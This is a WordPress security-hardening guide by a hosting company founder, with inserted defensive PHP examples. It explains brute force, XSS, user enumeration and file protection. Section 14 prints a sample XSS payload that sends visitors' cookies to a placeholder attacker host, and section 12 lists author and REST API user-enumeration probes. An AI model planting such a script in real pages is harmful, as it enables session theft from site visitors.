The Complete WordPress Security Guide

Dave Abargel

Securing a WordPress website is an essential responsibility of any website owner.
As of March 2019 (according to research by W3Techs), WordPress is by far the most popular Content Management System (CMS): it accounts for 60.4% of all websites that use a CMS, which comes out to 33.5% of all websites on the internet.


There’s a myth going around the web that WordPress isn’t secure and invites a lot of attacks and hacking attempts, but as you can infer from the numbers, the reason WordPress has more reported security issues and hacked websites is that it makes up such a large share of all CMS-hosted websites. That gives attackers more incentive to search for security flaws and exploits in WordPress, since there are more potential targets.

It is safe to say that WordPress as a system, and especially its core files, is well secured, regularly maintained and frequently updated by hundreds of programmers who are part of the open-source community. A large part of the security problems are the result of human error, whether it’s wrong configuration or poor maintenance of WordPress. In this guide we’ll discuss the best maintenance and security advice for securing your WordPress website.

Security in WordPress must not be taken lightly
Fun fact: every week Google adds more than 20,000 websites to its blacklist for malicious content and more than 50,000 websites for phishing.

In order to make sure your website stays safe and secure, follow this article as we discuss the best ways to maintain and secure your WordPress website.

* This guide is aimed at WordPress websites hosted on a Linux server, but it may be relevant for Windows servers as well.

1. Keeping WordPress and its components regularly updated

WordPress is a free, open-source Content Management System maintained by a large community of developers. The CMS is made up of several different components: the core WordPress code, and the themes and plugins that are installed by the user.

Core Updates

With every release, WordPress developers upgrade the system in different ways: they add new features, improve stability and performance and enhance existing features in order to keep up with today’s standards.

Additionally, every update contains fixes for bugs found since the previous release, and these releases often include security fixes and improvements.

Regularly updating to the latest version of WordPress will help immensely in securing your website, and keeping it up to date with the latest features and options.

By default, WordPress automatically installs minor updates, but for major releases you must enable the Automatic Updates feature (in the system’s Updates menu).


Because WordPress is an open-source system that is widely available, older releases contain security issues that are well known across the internet and are easy prey for hackers, who usually target old and outdated software. For example, a recent article by Sucuri describes an XSS vulnerability that was fixed in WordPress version 5.1.1.

If your WordPress version is out of date, you’re exposed to many more breaches, because the security flaws in these versions are well known and are easier for attackers to use than trying to find new flaws and exploits in newer WordPress versions.

On top of all this, it’s important to remember never to modify WordPress’s core files. Any change made to these files will be overwritten when updating, which usually makes website owners reluctant to update WordPress. Not updating WordPress directly impacts your website’s security and will surely lead to potential security breaches and other issues in the future.

Updating Themes and Plugins

Following its immense success, a market for WordPress plugins has been born. The market has a vast variety of plugins, made by developers and companies worldwide. This shows just how modular WordPress is, being able to synchronize and utilize an enormous pool of plugins and themes.

As of today, WordPress has tens of thousands of plugins and themes that are readily available to install. These plugins and themes are developed by third-party developers, and most of them make sure to update and support their creations after releasing them.

Keeping your plugins and themes updated is crucial to the security and stability of your website. It’s very important to always try and keep your WordPress version up to date, as well as the plugins and themes that are installed on your website.

* A note on premium/paid plugins and themes (not available through the WordPress plugin repository): paying for a plugin or theme does not guarantee its quality or security, and in many cases they aren’t regularly updated, or aren’t updated at all. Even when they are updated, the process is usually complicated and has to be done manually (although some plugins and themes include a way to update them through the WordPress dashboard).

Adding Plugins and Themes

It’s highly recommended to only use plugins and themes that are available in the official WordPress plugin repository, or that are developed by well-known companies. This will prevent many future issues, since these plugins and themes have been thoroughly checked to make sure they don’t contain any malicious code and are regularly updated. It’s important to note that even official or popular plugins aren’t guaranteed to be perfectly secure, so it’s recommended to stick to trusted plugins.

uPress Customers: There are 2 toggles for automatic updates, one for the core WordPress releases and another for plugin updates, both under the WordPress tab.

2. Usernames, strong passwords, user permissions

Picking a unique user name

It’s crucial to pick the correct username for your WordPress website.
Picking “admin” as your username is basically doing half the job for the hackers targeting your website.
This is probably one of the most important and easiest steps you can take to secure your website and prevent unnecessary risks.

Picking and using your password

One of the most common methods used by hackers is attempting to guess your WordPress admin login details by trying to log in with a lot of different passwords; this is called a Brute Force attack. Most likely they’ll try passwords from a large list of known passwords (a Dictionary Attack), but other times they will try every combination of characters until they find the correct password (this is what people usually have in mind when referring to a Brute Force attack).


This is the reason why it’s recommended you create a long and complicated password for your website. This includes not only your WordPress dashboard but also your FTP accounts, databases, managed hosting, email tied to recovering your website and pretty much every other service that’s tied to your website.

There’s a surprising number of WordPress users who use phrases such as “password” or “12345678” as their password. These passwords, along with birth dates, ID numbers and phone numbers, are easy to guess and will be among the first that bots or hackers try.

Many website owners don’t like to use long and complicated passwords simply because they’re hard to remember. A good solution is to use a complete sentence that makes sense only to you (even misspelling a word on purpose), which is much easier to remember. These kinds of passwords are much better than a single-word password (although merely replacing letters with numbers is not secure enough).
Another solution is to use a password manager that will generate secure passwords and store them for you.

If you’re composing the passwords yourself, it’s recommended to use at least 8 characters, and to include the following:
• Numbers (1-9)
• Lowercase letters (a-z)
• Uppercase letters (A-Z)
• Special characters (!@#$%^ etc.)

Another important thing to note: never reuse a password you’ve used in the past. The ideal password is unique and hard to anticipate or guess from easily accessible information.

Strict permission management

Another way to minimize security risks is to run a strict and clear policy for your user permissions. In other words, don’t give anyone access to your WordPress dashboard unless you absolutely have to.

If you have a large team (designers, editors, SEO managers etc.), make sure you understand their needs and their respective skills before giving them their own users and permissions on your website.

A quick rundown of all available user roles and their permissions in WordPress:
Subscriber – A user who is registered on your website. They don’t have access to any dashboard page except their own profile.
Contributor – Has permission to edit and manage their own posts, but can’t publish them (their posts are sent to an editor or administrator for approval).
Author – Has permission to edit and publish their own posts.
Editor – Has permission to edit and publish their own and others’ posts and pages, but has no access to the “sensitive” areas of the dashboard.
Administrator – The website admin; has permission and access to all features and options available in WordPress.
Super Administrator – (Only available on Multisite installs) Has access to manage all websites on the Multisite network.

* Themes and plugins can add or remove roles.

3. Disable the option to edit files from within the WordPress dashboard

By default, WordPress allows editing theme and plugin files through a dedicated code editor in the dashboard. In the wrong hands this tool is extremely dangerous and a massive security risk, as it can be used to include arbitrary code in your plugins or theme, which is why we recommend disabling this option completely.

A safer alternative is to edit the files through an FTP client or through a built-in file manager offered by your hosting provider.
To disable file editing through WordPress, add the following line to your website’s wp-config.php file (make sure to add it above the line /* That's all, stop editing! Happy blogging. */):

 define('DISALLOW_FILE_EDIT', true);

4. Restrict access to the login/management areas

Hackers and malware can try and access the management areas (wp-admin) or the login page (wp-login.php) of your website without any restrictions.

If you have control over the firewall, we highly recommend restricting access to these areas exclusively to the country you or your team are based in, or taking it a step further and restricting it to specific IP addresses.

There’s another method of protecting these areas using a password on the server side (popular on Linux-based Apache servers) that provides an extra layer of defense before a hacker or malware can reach said areas.

5. Disabling XML-RPC Protocol

The XML-RPC protocol has been enabled by default in WordPress since version 3.5. It lets you connect your WordPress website remotely to other websites and services.

While useful, it can be used in attacks against your website, and it can also be used to attack other websites on the internet.

For example, hackers or malware that want to try 100 different passwords to access your account would normally have to make 100 separate login attempts (and in that case your security systems should recognize the attempts and block them).

Using XML-RPC, they can call the function system.multicall (which is enabled by default) and try thousands of different passwords in a small number of requests, which is why, if you’re not using XML-RPC, we highly recommend disabling it.

You can limit XML-RPC connections in one of the following ways:
• Blocking access to the xmlrpc.php file in your firewall or in your server configuration (e.g. the .htaccess or nginx.conf files).
• Installing a plugin like Disable XML-RPC which is available for download through the official WordPress repository.

uPress customers: there is an XML-RPC toggle under the security tab, which disables the protocol by default.

6. Enable Two-factor authentication

Enabling two-factor authentication on your WordPress website (a second authentication step using a separate one-time code delivered by email or SMS, or generated on another device) can significantly improve your website’s security and provides an extra layer of defense before anyone reaches the sensitive areas of the website.


One of the easier ways to do this is with the Google Authenticator plugin, which is available for download from the official WordPress repository and offers a second factor via a mobile app.

After installing everything, you log in with your username and password and are then asked for a 6-digit code shown in the mobile app; this code changes every 30 seconds and can only be generated by the app that is paired with your user account.

Please note: In order for this to work, you must have the Authenticator app installed on your smartphone.

7. Limit the number of failed login attempts

This is actually a fundamental and basic step you must take to properly secure your website from Brute Force attacks.

As we mentioned earlier in this article, Brute Force attacks are carried out by hackers or bots that try to guess your password. They attempt a large number of different passwords until they successfully log in to your account.

If there’s no restriction set by the server/firewall/website – the attacker will eventually manage to guess the correct password and will be able to access the dashboard.

This is why it is important to limit the number of failed login attempts before the system automatically blocks the attacker’s IP from accessing the website.

One of the easier ways to set this up is using a plugin called Limit Login Attempts Reloaded that’s available for download from the official WordPress plugin repository.

uPress customers: The plugin WeSafe is installed by default on all the websites on our servers and performs this action.

8. Removing non-active plugins and themes

In August 2011, it was revealed that the popular script TimThumb, which is (as of now) included in popular WordPress plugins and themes, was in fact vulnerable to malicious exploits. Within days, attackers were using this flaw to their advantage, ranging from spamming promotional material for other websites (SEO hijacking) to modifying PHP files stored on the server, with random, meaningless characters at best, or even injecting other malicious code and exploits.

Most website owners didn’t realize that the script (and the malware) was running on their server. Some of them deactivated the problematic plugin or theme but did not completely remove it. The fact that the plugin or theme was deactivated was irrelevant, since the code still existed on the server, and that’s all that was needed for it to be exploitable.

Attackers started scanning websites hoping to find the TimThumb flaw. When they found it, they began planting malicious PHP files on the server, even where the plugins and themes were deactivated, since the files still existed and could be accessed directly.

The golden rule of plugins and themes: if you’re not using a plugin or theme, delete it!
This advice is valid for any piece of software: if you’re not using it, simply remove it from your server. There’s no reason to keep it there if there’s no use for it.

9. The direct correlation between a backup system and a good night’s sleep

A good and trustworthy backup system is the first tool in your arsenal against WordPress security exploits. Remember, no website is 100% secure at all times.
If government websites and big international corporate websites are hacked on a daily basis, your website is vulnerable too.

Having an accessible backup allows you to quickly recover from a breach by restoring your data to a version that is known to be clean and safe.

You can and should back up your WordPress website on a few levels:
• At the server level: it’s recommended to perform a daily backup, kept for a time frame of at least 30 days, and even better if the backups are stored on a different server.
• Another, less reliable option is a trusted backup plugin for your WordPress website. There are a few free or premium options available, for example VaultPress or UpdraftPlus; we recommend using a plugin that can send backups to an external cloud storage service (such as Dropbox, OneDrive, etc.).

Use the 3-2-1 rule: keep at least 3 copies of the data, in at least 2 locations, and at least 1 copy off-site.

10. Minimum requirements for a secure server

Your hosting service plays the most important part in securing your WordPress website.
A good hosting company closely monitors new and existing security threats around the web and takes extra measures to protect its servers from these threats and any future attacks.

Important features we recommend looking for when choosing your hosting provider:
• Frequent monitoring of their servers in order to detect suspicious activity.
• The capacity to withstand a DDoS attack.
• Regular maintenance of the server’s core components, updating them frequently to prevent any chance of security exploits.
• A disaster recovery feature and a contingency plan for emergencies, so you can protect your valuable information and content.
• Support for at least PHP version 7.2 (according to php.net, version 7.1 stops receiving security updates as of 2020).
• Support for MySQL version 5.5 and up.
• A separate database user per website on the server.
• Isolated users: a complete separation between different users (on shared hosting services).
• A built-in firewall, preferably an application-level one (WAF) that offers options specifically for WordPress.
• A network intrusion detection system that regularly scans a wide range of parameters around your website’s activity.
• Regular wide scans of the websites on the server, with notifications to you when necessary.
• A simple way of tracking any file changes on your website.

11. Bad Bots – block and prevent

In most cases, hackers tend to send “spies” to check on a website before they start an attack. These are what we call “Bad Bots”.

Bad bots affect your website’s performance, steal your content, consume your valuable bandwidth and skew your website statistics, and most importantly, they look for security vulnerabilities.

You can find a long list of bots that have been marked as “bad” at botreports.com; if you’re using a security plugin or a properly secured web hosting service for WordPress, you’re probably already blocking the bots on this list.
And yet, if you decide you do want to block these bots manually, here are a few ways to do it:
• Blocking them using your firewall (if you’re blocking them on a number of websites, this is the preferred method).
• At the server configuration level (.htaccess or nginx.conf files).
• Using a plugin like StopBadBots, which is free to download from the WordPress repository.

uPress customers: There’s a “block bad bots” toggle under the security tab in our management panel.

12. User protection program

By default, WordPress websites expose each user’s post archive, which lists all of their published posts.
Bots know how to use this to reach the user’s sensitive information by brute-forcing the user ID, like this:

https://www.domain.co.il/?author=1
https://www.domain.co.il/?author=2
https://www.domain.co.il/?author=3

The recommended action is to block access to the path:

https://www.domain.co.il/?author=*

Another way to reach sensitive user information is the REST API, which allows sharing information between different sources.
With the REST API you can easily access, over HTTP, information from a database stored on a remote server (a WordPress website).

Starting with WordPress version 4.7, the REST API is included as part of the core WordPress components and is enabled by default.
This can make it easier for hackers or malware trying to steal user information. For example, by opening this URL:

https://www.domain.co.il/wp-json/wp/v2/users

you’ll receive a neatly organized JSON list of all the users on your website and their information.

We recommend blocking the sensitive paths exposed by the REST API. (It’s not possible to disable this feature completely, because parts of it are used by WordPress itself and by certain plugins; for example, the new visual editor “Gutenberg”, included with WordPress version 5.0+, requires it.)

You can block it in a number of ways:
• Using your firewall to block the path wp-json/wp/v2/users
• Using .htaccess or nginx.conf to block the path wp-json/wp/v2/users
• Using a plugin like Disable REST API, which lets you block specific REST API paths or block it entirely for non-logged-in users. The plugin is available for download from the official WordPress repository.

uPress customers: There’s a REST API toggle under the security tab.
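For sites where the firewall or web server is not under your control, both recommendations above can be applied from within WordPress. The following must-use plugin is an added example and not part of the original guide or of any uPress tooling; it assumes WordPress 4.7 or newer and is dropped into wp-content/mu-plugins/ (the file and plugin names are my own choice). It turns away anonymous numeric ?author= probes and removes only the users routes from the REST API for visitors who are not logged in, so Gutenberg and plugins that need the rest of the API keep working:

```php
<?php
/**
 * Plugin Name: Block user enumeration
 * Description: Added example (not from the guide). Place in wp-content/mu-plugins/.
 */

// Part 1: ?author=N probes. Handle them on 'init', which runs before WordPress'
// canonical redirect would turn ?author=1 into /author/<login-name>/ and reveal
// the login name. This stops the numeric lookup only; author archives reached
// through their permalink are unaffected.
add_action( 'init', function () {
    // Editors legitimately use ?author=N in wp-admin list screens, so act only on
    // the public front end and only for visitors who are not logged in.
    if ( is_admin() || is_user_logged_in() ) {
        return;
    }
    $author = $_GET['author'] ?? null;
    if ( is_string( $author ) && ctype_digit( $author ) ) {
        wp_safe_redirect( home_url( '/' ), 301 );
        exit;
    }
} );

// Part 2: REST API user listing. Drop the /wp/v2/users routes for anonymous
// callers; the route keys below are the ones core registers for the users
// controller. Logged-in users (and therefore the block editor) still see them.
add_filter( 'rest_endpoints', function ( array $endpoints ) {
    if ( is_user_logged_in() ) {
        return $endpoints;
    }
    foreach ( array( '/wp/v2/users', '/wp/v2/users/(?P<id>[\d]+)' ) as $route ) {
        unset( $endpoints[ $route ] );
    }
    return $endpoints;
} );
```

An anonymous request to /wp-json/wp/v2/users then receives the standard rest_no_route 404 instead of the user list.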

13. Hide your WordPress version!

Taking a quick look at your WordPress website’s source code will show you that WordPress automatically embeds a meta tag that contains information about the WordPress version you use.

<meta name="generator" content="WordPress 4.9.10">

This information is accessible to everyone, including hackers and malware. Knowing the WordPress version your website is running makes life easier for them, as they know what kind of attacks and tactics they can use against that specific version.

Articles about old security flaws in older WordPress versions describe the many ways a hacker can exploit them, creating a shortcut to your sensitive information. (For example, evidence of a known security hack in WordPress 4.7.0.)

Hackers tend to look for websites running older versions of WordPress that have well-known security exploits. That’s why we strongly recommend keeping WordPress up to date.

You can hide your WordPress version by adding the following code to your theme’s functions.php file:

remove_action('wp_head', 'wp_generator');

14. Take care of XSS exploits

An XSS (Cross-Site Scripting) attack is when malicious scripts are injected into your website, usually as a script that runs in the browser, so that the script is downloaded and executed in every visiting user’s browser.
For example, an attacker could inject an XSS payload simply by submitting it as a comment on a post, with the script looking something like this:

<script>window.location="http://attacker-website/?cookie="+document.cookie</script>

If the website isn’t prepared for XSS, every user who opens the affected article will load the comment section together with the script, which then runs in the user’s browser (a protected website will show the script as plain text).

That was, of course, only an example; by default WordPress knows how to deal with comments containing XSS (using its built-in filtering and sanitization features). XSS can be injected in many other places, not just the comment section: a search field, a contact form, etc.

You can protect your website from XSS by sanitizing and escaping data before outputting it (every component that visitors can edit).
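The comment, search-field and contact-form cases above, as an added example that is not from the guide: a theme or plugin fragment that echoes visitor-supplied text, first in the vulnerable form and then escaped with WordPress’s own output functions, chosen per output context. The function names are my own; esc_html(), esc_attr(), esc_url() and wp_kses_post() are core WordPress functions:

```php
<?php
// Added example (not from the guide): escaping visitor-supplied text on output.

// VULNERABLE: the search term is written into the page as-is. A link whose ?s=
// parameter carries a <script> tag makes that script run for whoever follows it.
function search_heading_unsafe( string $term ): string {
    return '<h2>Results for "' . $term . '"</h2>';
}

// SAFE: esc_html() turns <, >, &, " and ' into entities, so the browser displays
// the text of a <script> tag instead of executing it (the "plain text" a
// protected site shows).
function search_heading_safe( string $term ): string {
    return '<h2>Results for "' . esc_html( $term ) . '"</h2>';
}

// Contact-form field that re-displays what the visitor typed: a value inside an
// attribute needs esc_attr(), which also stops the input from closing the quote
// and adding attributes such as event handlers.
function name_field( string $value ): string {
    return '<input type="text" name="name" value="' . esc_attr( $value ) . '">';
}

// A URL supplied by a visitor (for example a comment author's website): esc_url()
// only allows http, https, mailto and a few other protocols, so a javascript:
// link is reduced to an empty href, and the rest is encoded.
function author_link( string $url, string $label ): string {
    return '<a href="' . esc_url( $url ) . '">' . esc_html( $label ) . '</a>';
}

// Comment body where some markup is wanted: wp_kses_post() keeps the tags and
// attributes WordPress allows in post content and strips <script>, on* event
// handlers and similar, which is the same sanitization core applies to comments.
function comment_body( string $html ): string {
    return '<div class="comment">' . wp_kses_post( $html ) . '</div>';
}

// In a search template:
// echo search_heading_safe( get_search_query( false ) );
```

The rule the example follows is escape late and per context: the same visitor string needs esc_html() in element text, esc_attr() in an attribute and esc_url() in an href.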

15. Hide PHP errors

WordPress comes packed with an error reporting system as part of its core components. This feature is great for developers who want to debug their coding errors (in plugins or themes) but when talking about securing a website, we’re going to want to hide our PHP errors.

For example, a PHP error in WordPress would usually look like this:

PHP: syntax error, unexpected '^' in /wp-content/plugins/plugin.php on line 6

This kind of information makes it easier for hackers or malware to attack, which is why we recommend hiding these error messages from the public eye.
This can be done by editing the wp-config.php file with the following code:

 // Hide PHP errors from visitors (errors can still go to the server's error log)
 ini_set('display_errors', 'Off');
 ini_set('error_reporting', E_ALL);
 // The WordPress debug constants are WP_DEBUG and WP_DEBUG_DISPLAY
 define('WP_DEBUG', false);
 define('WP_DEBUG_DISPLAY', false);

16. Reset file and folder permissions

Usually, there’s no reason for file and folder permissions to change, but you should make sure the permissions are set up the way WordPress officially suggests.
Remember that a folder with a permission of 777 allows anyone to read and write files in the folder.

According to WordPress (As of March 2019), these are the recommended permissions for a WordPress website:
• wp-config.php needs the permission of 600
• All files need the permission of 644 or 640
• All folders need the permission of 750 or 755

* You can adjust the permissions of files and folders through an FTP client and by using a Reset Permissions button on some hosting services.


uPress customers: There’s a reset permissions button for all files and folders to WordPress’ recommendation under Development → Additional Tools for Web Hosting.

17. Use Authentication keys

By default, WordPress installations come with a wp-config.php file that contains placeholder keys. When we use the regular WordPress installation method, the system generates authentication keys for our website.
Using unique authentication keys is a very important security measure you can take to protect your website. These keys are also known as “Security Keys”.

WordPress uses these keys to protect the information stored in registered users’ cookies (user name and password). The information is turned into a seemingly random string of letters and numbers, a hash, that can only be validated using the website’s security keys, which decreases the chance of someone recovering a username and password from the cookie on the user’s computer.

For example, this is how authentication keys are set by default:

 define('AUTH_KEY',         'put your unique phrase here');
 define('SECURE_AUTH_KEY',  'put your unique phrase here');
 define('LOGGED_IN_KEY',    'put your unique phrase here');
 define('NONCE_KEY',        'put your unique phrase here');
 define('AUTH_SALT',        'put your unique phrase here');
 define('SECURE_AUTH_SALT', 'put your unique phrase here');
 define('LOGGED_IN_SALT',   'put your unique phrase here');
 define('NONCE_SALT',       'put your unique phrase here');

And this is how authentication keys should look:

define('AUTH_KEY',         'X<@vIF23>d~#%kYe^_>xhv~xUJ*ia*y+ALlJLGv7qFJe<EnpEwD:g~~&$}+DC5eF');
define('SECURE_AUTH_KEY',  'nA@GM?#u7v99Yk+8sM|+ZeF;]P74f`2v|z]{dKS|+cojC.w<&o4LeGvv-]$FWX4^');
define('LOGGED_IN_KEY',    'UNOk*x]$V_a]]vtKZM>`gs2Ht^O/`Rl|>EJzO9/*Y|)tJ2`&rg8FZ 5`l,67)`1U');
define('NONCE_KEY',        'pc-UFE^.+7?+vPD^,i& ^^R?+|I-q+7p>?d2*NZ|zUf|?e&v&?6iz-gF+~m*?(L=');
define('AUTH_SALT',        '7n_U|q1kJ)s)8_#5sb! FY]l)Y!Eyyse85!/$G>qh(XbTYpefVxC_M/naQKhM#PL');
define('SECURE_AUTH_SALT', 'Mw^0=5J5:TWi;fl|*$l|i]f7Gyw-}1@-G5ZPc1atjhg@8v#&& ?1re#D!vtE:g&^');
define('LOGGED_IN_SALT',   '~hZF}x2b&F^Q-WQK8^q>5pS!|6eT^<6z!WSNcv;Jd&8mY2T9M`:S Z ;OYGd[{$e');
define('NONCE_SALT',       'rH&yz6/_S0hXVnJOJ28?]EME!}s>V<%+<[e;FEl:d)t>+P%|atn+Ktq-lpk{+WIM');

Check your wp-config.php file to see if you have unique authentication keys configured.
If you don’t, we recommend creating them with the dedicated WordPress security keys generator and adding them to your wp-config.php.
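To verify that the wp-config.php settings from sections 3, 15 and 17 (and the 600 file mode from section 16) are actually in place, here is an added command-line script that is not part of the guide. It reads the file as text rather than executing it, so it assumes the usual one-define-per-line layout; run it as php audit-wp-config.php /path/to/wp-config.php (the script name is my own):

```php
<?php
// Added example (not from the guide): php audit-wp-config.php /path/to/wp-config.php

const WP_KEY_NAMES = array(
    'AUTH_KEY', 'SECURE_AUTH_KEY', 'LOGGED_IN_KEY', 'NONCE_KEY',
    'AUTH_SALT', 'SECURE_AUTH_SALT', 'LOGGED_IN_SALT', 'NONCE_SALT',
);
const WP_KEY_PLACEHOLDER = 'put your unique phrase here';

/** Collect define('NAME', value) pairs; string values lose their quotes. */
function parse_defines( string $source ): array {
    $defs = array();
    // The key generator never emits quotes or backslashes, so [^']* is enough.
    $re = "/define\(\s*'([A-Z_]+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)/";
    if ( preg_match_all( $re, $source, $matches, PREG_SET_ORDER ) ) {
        foreach ( $matches as $row ) {
            // $row[2] is the quoted string (possibly ''), $row[3] the boolean literal.
            $defs[ $row[1] ] = isset( $row[3] ) && $row[3] !== '' ? $row[3] : $row[2];
        }
    }
    return $defs;
}

/** Return a list of findings; an empty array means everything checks out. */
function audit_wp_config( string $path ): array {
    $source = @file_get_contents( $path );
    if ( $source === false ) {
        return array( "cannot read $path" );
    }
    $defs     = parse_defines( $source );
    $findings = array();

    // Section 3: the dashboard file editor must be switched off.
    if ( ( $defs['DISALLOW_FILE_EDIT'] ?? '' ) !== 'true' ) {
        $findings[] = 'DISALLOW_FILE_EDIT is not set to true';
    }

    // Section 15: debug output must never be shown to visitors
    // (WP_DEBUG defaults to false, WP_DEBUG_DISPLAY defaults to true).
    if ( ( $defs['WP_DEBUG'] ?? 'false' ) === 'true'
         && ( $defs['WP_DEBUG_DISPLAY'] ?? 'true' ) !== 'false' ) {
        $findings[] = 'WP_DEBUG is on and WP_DEBUG_DISPLAY is not false';
    }

    // Section 17: every key and salt must be present, replaced, long and unique.
    $seen = array();
    foreach ( WP_KEY_NAMES as $name ) {
        $value = $defs[ $name ] ?? null;
        if ( $value === null || $value === '' ) {
            $findings[] = "$name is missing or empty";
        } elseif ( $value === WP_KEY_PLACEHOLDER ) {
            $findings[] = "$name still holds the default placeholder";
        } elseif ( strlen( $value ) < 64 ) {
            $findings[] = "$name is shorter than 64 characters";
        } elseif ( isset( $seen[ $value ] ) ) {
            $findings[] = "$name repeats the value of " . $seen[ $value ];
        }
        if ( $value !== null && ! isset( $seen[ $value ] ) ) {
            $seen[ $value ] = $name;
        }
    }

    // Section 16: the file itself should be readable by its owner only (600).
    $mode = fileperms( $path ) & 0777;
    if ( $mode !== 0600 ) {
        $findings[] = sprintf( 'file mode is %04o, expected 0600', $mode );
    }
    return $findings;
}

if ( PHP_SAPI === 'cli' && isset( $argv[1] ) ) {
    $findings = audit_wp_config( $argv[1] );
    foreach ( $findings as $finding ) {
        echo "- $finding\n";
    }
    echo $findings ? count( $findings ) . " finding(s)\n" : "OK\n";
    exit( $findings ? 1 : 0 );
}
```

A freshly unpacked wp-config-sample.php fails the key checks eight times and the DISALLOW_FILE_EDIT check once; after pasting the generator output and adding the section 3 line, only the file mode remains to fix.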

18. File manager – disabling PHP execution in folders where it’s not necessary

Another way to tighten up your website’s security is to disable PHP execution in folders that don’t require it.
For example, the folder /wp-content/uploads/ isn’t supposed to contain any PHP files.
If we disable PHP execution there, we effectively block hackers and malware from running any PHP files containing exploits that may end up in this folder.

You can use a .htaccess file placed in that folder to perform this block; here’s how:

# .htaccess - Disable PHP execution (place in /wp-content/uploads/)
<Files *.php>
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order Allow,Deny
        Deny from all
    </IfModule>
</Files>

uPress customers: This option is an integral part of our management panel and is set to block PHP files in the uploads directory by default.

19. Secure the important files

The wp-config.php file probably contains the most sensitive information about your website. Among other things, it holds the access credentials for your database, the authentication keys and settings. A crucial step is blocking direct access to this file.

This can be done using the .htaccess file:

# .htaccess - Protect wp-config.php
<Files wp-config.php>
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order Allow,Deny
        Deny from all
    </IfModule>
</Files>

uPress customers: This option is an integral part of our management panel and access to this file is blocked by default.

Another file to secure is the .htaccess file itself (on Apache servers), which contains your website’s server configuration. On an Apache server you’d usually protect it at the server level, but if that’s not possible, you can use the .htaccess file to protect itself:

# .htaccess - Protect .htaccess (and .htpasswd) files
<Files ~ "^.*\.([Hh][Tt][Aa])">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order Allow,Deny
        Deny from all
        Satisfy all
    </IfModule>
</Files>

20. Encrypt your information with TLS (TLS/SSL Certificate)

A TLS certificate’s purpose is to encrypt the data transferred between the user’s browser and the server. We use the TLS (Transport Layer Security) protocol combined with a dedicated certificate on the server.

The TLS certificate is based on unique encryption keys installed on the website’s server, and only with these keys can the information be decrypted.

Using the TLS protocol, you can be certain that the information transferred between you and your users is safe from prying eyes.

As of today (March 2019), a TLS certificate can be obtained free of charge from most hosting providers through the free Let’s Encrypt service.

uPress customers: You can install a TLS certificate from the security tab in our management panel.

21. Closely monitor the activity on your website

Another way to secure your WordPress website is to closely monitor crucial activities that happen in the management area both in real-time and past activity.

In order to properly monitor these activities, you’ll need a logging plugin that’ll run in the background and document every action.

Using such a plugin you can see which users logged in to your website and what they edited, what changes were made, which plugins were added or removed, which media files were uploaded, which configuration changes were made, etc.

To do all this, you can use the plugin ARYO Activity Log which is available for download from the official WordPress plugin repository.

Conclusion

Data security in WordPress websites is a sensitive topic that should not be taken lightly, especially when managing a website containing sensitive information. This article has given you many tools to work with even if you are at a moderate technical level.

Each and every one of the tips and methods mentioned above takes you one step closer to a safe, secure website. Any advice you apply to your WordPress website makes it harder for hackers to break in.

Most of these methods take only a few minutes to implement, so there’s no reason to postpone anything until tomorrow or the day after; get everything done as soon as possible.

Apart from the advice given above, don’t forget these basic rules:
• Never leave yourself logged in to your computer while away; always keep it locked with a password.
• Keep your computer free of viruses.
• Try to perform updates only on a safe internet connection.
• Add your website to Google Search Console to get notifications about security issues that prevent your website from appearing in search results.
• Apart from the scan you’re going to do when following this guide, perform security scans on a regular basis.
• Don’t open links that look suspicious or whose sender you don’t know.
• Don’t confirm warnings stating you’re about to perform a dangerous action before understanding the risks. They warn you for a reason.
• Consider using reCAPTCHA on pages with contact forms.

I hope you found this guide useful. Do you have anything to add or your own advice for securing a WordPress website? We’ll be happy to hear from you.

Dave Abargel

VP and founder of uPress, developer of Backend & Frontend, specializes in improving performance for WordPress websites, handling advanced security issues, and marketing on social networks. He is an active partner in a number of interesting projects in the field, such as WiPi, Enable, Greenicon, Speedom, and more.
